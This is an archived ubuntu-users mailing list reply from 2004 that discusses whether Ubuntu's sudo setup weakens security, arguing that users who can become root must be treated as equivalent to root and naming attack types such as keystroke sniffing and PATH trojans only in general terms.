sudo security concerns ?

Matt Zimmerman mdz at
Fri Nov 26 20:19:47 UTC 2004

On Fri, Nov 26, 2004 at 12:31:25PM +0100, Eric Feliksik wrote:

> Matt Zimmerman wrote:
> >This was discussed months ago; the reality is that this doesn't open any
> >holes which don't already exist due to the inherent design of programs like
> >su and sudo.  Anyone who has control over a uid with access to su or sudo
> >has control of root as well..
> That's interesting. But how can a program become root if sudo requires a 
> user's password, other than sniffing keystrokes for that users' password?

Sniffing keystrokes for the user's password, placing a trojan ahead of the
real sudo in $PATH, injecting characters on the user's tty to cause commands
to be executed.  There are many possible attacks.

> I always loved the unix way of running everything as user, and become 
> root if you need to... Using windows with it's limited "run as 
> administrator" functionality was a pain.
> But this means that running one evil program as user 1000 (sudo'er) on 
> Ubuntu could compromise your system... Thereby the seperation of root 
> and user for malware is no longer relevant (well, ok, the malware has to 
> make use of this sudo-situation, but that's just a doorstep).
> The seperation is then only useful for preventing the legal user 1000 to 
> accidentally break things (because it's not always root).
> I think this model could use some thought, then?

As I said, the situation is exactly the same with su(1), i.e. the
traditional UNIX security model.  This problem is inherent to any model
which allows a user to run a privileged process under the control of a
less-privileged session.

In truth, Ubuntu's sudo-based configuration more accurately reflects the
reality of traditional UNIX system security: users who have the ability to
become root MUST be considered equivalent to root in terms of security.

Rethinking the UNIX security model is a bit beyond the scope of securing
Ubuntu at this point. ;-)  There are ways to mitigate some the problems, but
they are not complete solutions, and even so would require a lot of work to
implement and maintain.

 - mdz

More information about the ubuntu-users mailing list